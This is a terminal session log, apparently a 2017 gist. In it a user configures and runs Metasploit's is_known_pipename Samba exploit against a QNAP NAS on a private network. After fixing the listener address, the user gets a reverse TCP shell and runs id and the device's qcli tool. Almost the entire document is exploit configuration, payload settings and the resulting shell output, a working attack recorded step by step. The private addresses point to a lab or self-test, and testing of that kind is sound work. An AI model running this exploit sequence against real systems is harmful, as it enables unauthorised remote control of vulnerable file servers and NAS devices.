@chihchun
Created May 26, 2017 16:42
命令稿啟動於 2017年05月27日 (週六) 00時39分12秒
$ : 1495816752:0;script.sh 34:0;docker run -t -i --rm -p 4444:4444 kali-metasploit:trunk ^C
$
$
$
$
$ docker run -t -i --rm -p 4444:4444 kali-metasploit:trunk
[*] Starting the Metasploit Framework console...

.,,. .
.\$$$$$L..,,==aaccaacc%#s$b. d8, d8P
d8P #$$$$$$$$$$$$$$$$$$$$$$$$$$$b. `BP d888888p
d888888P '7$$$$\""""''^^`` .7$$$|D*"'``` ?88'
d8bd8b.d8p d8888b ?88' d888b8b _.os#$|8*"` d8P ?8b 88P
88P`?P'?P d8b_,dP 88P d8P' ?88 .oaS###S*"` d8P d8888b $whi?88b 88b
d88 d8 ?8 88b 88b 88b ,88b .osS$$$$*" ?88,.d88b, d88 d8P' ?88 88P `?8b
d88' d88b 8b`?8888P'`?8b`?88P'.aS$$$$Q*"` `?88' ?88 ?88 88b d88 d88
.a#$$$$$$"` 88b d8P 88b`?8888P'
,s$$$$$$$"` 888888P' 88n _.,,,ass;:
.a$$$$$$$P` d88P' .,.ass%#S$$$$$$$$$$$$$$'
.a$###$$$P` _.,,-aqsc#SS$$$$$$$$$$$$$$$$$$$$$$$$$$'
,a$$###$$P` _.,-ass#S$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$####SSSS'
.a$$$$$$$$$$SSS$$$$$$$$$$$$$$$$$$$$$$$$$$$$SS##==--""''^^/$$$$$$'
_______________________________________________________________ ,&$$$$$$'_____
ll&&$$$$'
.;;lll&&&&'
...;;lllll&'
......;;;llll;;;....
` ......;;;;... . .

=[ metasploit v4.14.22-dev-2835c165d7 ]
+ -- --=[ 1658 exploits - 947 auxiliary - 293 post ]
+ -- --=[ 486 payloads - 40 encoders - 9 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > use exploit/linux/samba/is_known_pipename
msf exploit(is_known_pipename) > set RHOST 10.11.12.227
RHOST => 10.11.12.227
msf exploit(is_known_pipename) > set LHOST 10.11.12.237
LHOST => 10.11.12.237
msf exploit(is_known_pipename) > set SMB_SHARE_BASE /share/CACHEDEV1_DATA/torrent
SMB_SHARE_BASE => /share/CACHEDEV1_DATA/torrent
msf exploit(is_known_pipename) > show optinos
[-] Invalid parameter "optinos", use "show -h" for more information
msf exploit(is_known_pipename) > show option
[-] Invalid parameter "option", use "show -h" for more information
msf exploit(is_known_pipename) > show options

Module options (exploit/linux/samba/is_known_pipename):

   Name            Current Setting                Required  Description
   ----            ---------------                --------  -----------
   RHOST           10.11.12.227                   yes       The target address
   RPORT           445                            yes       The SMB service port (TCP)
   SMB_FOLDER                                     no        The directory to use within the writeable SMB share
   SMB_SHARE_BASE  /share/CACHEDEV1_DATA/torrent  no        The remote filesystem path correlating with the SMB share name
   SMB_SHARE_NAME                                 no        The name of the SMB share containing a writeable directory

Exploit target:

   Id  Name
   --  ----
   1   Linux x86_64

msf exploit(is_known_pipename) > exploit

[*] Started reverse TCP handler on 172.17.0.2:4444
[*] 10.11.12.227:445 - Using location \\10.11.12.227\torrent\ for the path
[*] 10.11.12.227:445 - Hunting for payload using common path names: SgrCKKfK.so - //10.11.12.227/torrent/
[*] 10.11.12.227:445 - Trying location /share/CACHEDEV1_DATA/torrent/SgrCKKfK.so...
[*] Exploit completed, but no session was created.
msf exploit(is_known_pipename) > show options

Module options (exploit/linux/samba/is_known_pipename):

   Name            Current Setting                Required  Description
   ----            ---------------                --------  -----------
   RHOST           10.11.12.227                   yes       The target address
   RPORT           445                            yes       The SMB service port (TCP)
   SMB_FOLDER                                     no        The directory to use within the writeable SMB share
   SMB_SHARE_BASE  /share/CACHEDEV1_DATA/torrent  no        The remote filesystem path correlating with the SMB share name
   SMB_SHARE_NAME                                 no        The name of the SMB share containing a writeable directory

Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.17.0.2       yes       The listen address
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   1   Linux x86_64

msf exploit(is_known_pipename) > set LHOST 10.11.12.237
LHOST => 10.11.12.237
msf exploit(is_known_pipename) > show options

Module options (exploit/linux/samba/is_known_pipename):

   Name            Current Setting                Required  Description
   ----            ---------------                --------  -----------
   RHOST           10.11.12.227                   yes       The target address
   RPORT           445                            yes       The SMB service port (TCP)
   SMB_FOLDER                                     no        The directory to use within the writeable SMB share
   SMB_SHARE_BASE  /share/CACHEDEV1_DATA/torrent  no        The remote filesystem path correlating with the SMB share name
   SMB_SHARE_NAME                                 no        The name of the SMB share containing a writeable directory

Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.11.12.237     yes       The listen address
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   1   Linux x86_64

msf exploit(is_known_pipename) > exploit

[-] Handler failed to bind to 10.11.12.237:4444:- -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] 10.11.12.227:445 - Using location \\10.11.12.227\torrent\ for the path
[*] 10.11.12.227:445 - Hunting for payload using common path names: ouQlgeuC.so - //10.11.12.227/torrent/
[*] 10.11.12.227:445 - Trying location /share/CACHEDEV1_DATA/torrent/ouQlgeuC.so...
[*] Command shell session 1 opened (172.17.0.2:4444 -> 10.11.12.227:59752) at 2017-05-26 16:40:58 +0000
id
uid=65534(guest) gid=0(administrators) groups=65534(guest),760426308
qcli
/bin/sh: line 2: qcli: command not found
/sbin/qcli
Fail to lock log file!
: Permission denied
Fail to lock log file!
: Permission denied
-v --version, display the version of QCLI and exit.
-h --help, print this help.
-l --login, login to check authentication.
qcli_admin, admin operations.
qcli_volume, volume operations.
qcli_pool, pool operations.
qcli_raid, RAID operations.
qcli_hdd, HDD operations.
qcli_cache, cache operations.
qcli_iscsi, iSCSI operations.
qcli_iscsiacl, iSCSI ACL operations.
qcli_iscsibackup, iSCSI backup operations.
qcli_virtualdisk, virtual disk operations.
qcli_power, power operations.
qcli_network, network operations.
qcli_log, log operations.
qcli_backuprestore, backup/restore operations.
qcli_firmwareupdate, firmware update operations.
qcli_sharedfolder, shared folder operations.
qcli_quota, quota operations.
qcli_networkservice, network service operations.
qcli_encrypt, encrypt operations.
qcli_rsyncserver, rsync server operations.
qcli_rtrrserver, rtrr server operations.
qcli_timemachine, time machine operations.
qcli_nastonas, nas to nas operations.
qcli_rsync, rsync operations.
qcli_rtrr, rtrr operations.
qcli_networkrecyclebin, network recycle bin operations.
qcli_timezone, time zone operations.
qcli_domainsecurity, domain security operations.
qcli_wifi, wifi operations.
qcli_users, users operations.
qcli_usergroups, usergroups operations.
qcli_ntp, NTP service operations.
qcli_hardware, hardware operations.
qcli_systemstatus, system status operations.
qcli_externaldevice, external device operations.
qcli_mysqlserver, mysqlserver operations.
qcli_volumesnapshot, volume snapshot operations.
qcli_iscsisnapshot, iSCSI snapshot operations.
qcli_domaincontroller, domain controller operations.
qcli_snapreplica, SnapReplica operations.
qcli_snapshotvault, Snapshot Vault operations.
qcli_vjbod, Virtual JBOD operations.
QCLI 4.3.3 20170516, QNAP Systems, Inc.
exit
[*] 10.11.12.227 - Command shell session 1 closed. Reason: Died from EOFError
msf exploit(is_known_pipename) > exit
$ exit